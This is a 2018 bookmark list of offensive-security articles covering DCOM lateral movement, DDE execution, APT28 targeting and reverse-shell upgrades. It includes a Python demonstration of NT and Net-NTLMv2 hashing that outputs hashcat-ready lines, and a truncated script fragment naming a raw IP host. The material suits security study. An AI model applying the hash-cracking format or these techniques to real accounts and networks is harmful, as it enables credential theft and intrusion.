Last update Mar 17, 2018.
Stuff that I'm reading (or saving for later)
Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement
Background Last Wednesday, I had some down time so I decided to hunt around in \System32 to see if I could find anything of potential interest.
LM, NTLM, Net-NTLMv2, oh my!
When attacking AD, passwords are stored and sent in different ways, depending on both where you find them and the age of the domain. Most of these hashes are confusingly named, and both the hash name and the authentication protocol are named almost the same thing.
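The naming confusion above, as an added example that is not from the linked post: the stored "NTLM hash" (really the NT hash, MD4 of the UTF-16LE password, unsalted, hence pass-the-hash) versus the "Net-NTLMv2" value that crosses the wire (an HMAC-MD5 over the server challenge and a client blob, keyed by a per-user derivation of the NT hash, hence crackable or relayable but not passable). The formats follow MS-NLMP; the user name, domain, challenges, timestamp and target-info bytes are constructed for the example. LM is not covered because it needs DES, which the standard library lacks.

```python
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). hashlib.new("md4") is often disabled in
    OpenSSL 3 builds, so implement it rather than depend on the provider."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(48):
            if i < 16:
                fn, k, s, t = f(b, c, d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:
                fn, k, s, t = g(b, c, d), r2[i - 16], (3, 5, 9, 13)[i % 4], 0x5A827999
            else:
                fn, k, s, t = h(b, c, d), r3[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, rotl((a + fn + x[k] + t) & mask, s), b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """The 'NTLM hash' as stored in the SAM / NTDS.dit: MD4(UTF-16LE(password)).
    Unsalted and not tied to any challenge, so it can be passed as-is."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 per-user key: HMAC-MD5 keyed with the NT hash over UPPER(user)+domain.
    Note it needs only the NT hash, never the cleartext password."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_blob(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE structure (simplified: caller supplies AV pairs)."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def net_ntlmv2_response(nt: bytes, user: str, domain: str,
                        server_challenge: bytes, blob: bytes) -> bytes:
    """Net-NTLMv2: what crosses the wire during authentication.
    NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob); response = NTProofStr || blob."""
    proof = hmac.new(ntowf_v2(nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def verify_net_ntlmv2(nt: bytes, user: str, domain: str,
                      server_challenge: bytes, response: bytes) -> bool:
    """What a DC does: recompute the proof from the stored NT hash and compare."""
    proof, blob = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


def hashcat_5600_line(user: str, domain: str, server_challenge: bytes, response: bytes) -> str:
    """Net-NTLMv2 in the form hashcat mode 5600 consumes: USER::DOMAIN:chal:proof:blob."""
    proof, blob = response[:16], response[16:]
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample values (hypothetical user/domain, fixed challenges, empty AV list).
USER, DOMAIN = "alice", "CORP"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
SAMPLE_BLOB = ntlmv2_blob(0x01D3BE0000000000, bytes.fromhex("aaaaaaaaaaaaaaaa"), b"\x00\x00\x00\x00")


def demo(password: str = "password") -> dict:
    nt = nt_hash(password)
    resp = net_ntlmv2_response(nt, USER, DOMAIN, SERVER_CHALLENGE, SAMPLE_BLOB)
    return {
        "nt_hash": nt.hex(),                      # "8846f7eaee8fb117ad06bdd830b7586c"
        "net_ntlmv2": hashcat_5600_line(USER, DOMAIN, SERVER_CHALLENGE, resp),
        "verifies": verify_net_ntlmv2(nt, USER, DOMAIN, SERVER_CHALLENGE, resp),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The two hex strings look alike in a tool's output but are different objects: the NT hash is a reusable credential, while the Net-NTLMv2 line is bound to one server challenge and one client blob, so a captured one is only useful for offline cracking (mode 5600) or for relaying in the same session.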
The ultimate goal in the target selection stage is to compile a list of high-value individuals who have information or access that the APT28 group is interested in.
Many analysts and automated solutions take advantage of various memory detections to find injected DLLs in memory. Memory detections look at the properties (and content) of processes, threads, and memory to find indicators of malicious activity in the current process.
Reviving DDE: Using OneNote and Excel for Code Execution
TL;DR: You can achieve DDE execution with Excel SpreadSheets embedded within OneNote. This bypasses the original Excel mitigation ruleset (Microsoft has released a patch to properly mitigate this) as well as the Protected View sandbox.
Antonio 's4tan' Parata - .NET Instrumentation via MSIL bytecode injection (2018-01-11)
Title: .NET Instrumentation via MSIL bytecode injection. Author: Antonio 's4tan' Parata. Date: January 11, 2018.
New lateral movement techniques abuse DCOM technology
Network attacks often contain a lateral movement stage when adversaries move through the target’s network to find the data or asset that they’re ultimately after.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin HOST=191.101.180.
This is the start of a series I'm calling Autored. My goal is to quickly stand up temporary systems I commonly use during an engagement. Other efforts in this area have been documented, but they are more complex and time consuming to manage.
Upgrading shells to fully interactive TTYs
Every pentester knows that amazing feeling when they catch a reverse shell with netcat and see that oh-so-satisfying verbose netcat message followed by output from id.